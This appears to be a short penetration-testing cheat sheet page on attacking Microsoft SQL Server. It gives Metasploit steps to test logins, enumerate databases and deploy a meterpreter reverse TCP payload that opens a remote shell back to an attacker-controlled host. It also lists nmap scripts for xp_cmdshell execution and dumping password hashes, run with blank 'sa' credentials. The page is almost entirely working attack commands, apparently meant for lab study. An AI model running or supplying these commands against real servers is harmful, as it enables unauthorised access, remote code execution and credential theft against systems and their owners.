SQL

Test creds

msf> use auxiliary/scanner/mssql/mssql_login

set rhosts 172.16.64.199 set rport 1433 set username fooadmin set password fooadmin set verbose true

run //looking for it to say success but will never give us a shell

Show DBs and info:

msf> use auxiliary/admin/mssql/mssql_enum

set rhosts 172.16.64.199 set rport 1433 set username fooadmin set password fooadmin set verbose true

run //we want to keep an eye out to see if we are an admin user and if cmd or remote access are enabled

msf> use exploit/windows/mssql/mssql_payload

set rhosts 172.16.64.199 set rport 1433 set srvport 53 set username fooadmin set password fooadmin set verbose true

set payload windows/x64/meterpreter_reverse_tcp

set lhost 172.16.64.10 set lport 1234

run //wait for the shell to push then we can do a 'getuid' to see if it worked.

//shell msf>shell //will then spawn our shell into the msql box

#nmap --script-help "ms and sql"

broadcast-ms-sql-discover ms-sql-brute ms-sql-config ms-sql-dac ms-sql-dump-hashes ms-sql-empty-password ms-sql-hasdbaccess ms-sql-info ms-sql-ntlm-info ms-sql-query ms-sql-tables ms-sql-xp-cmdshell

#nmap --script -sV -p 1433

EX: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433

PreviousRDPNextNoSQL

Last updated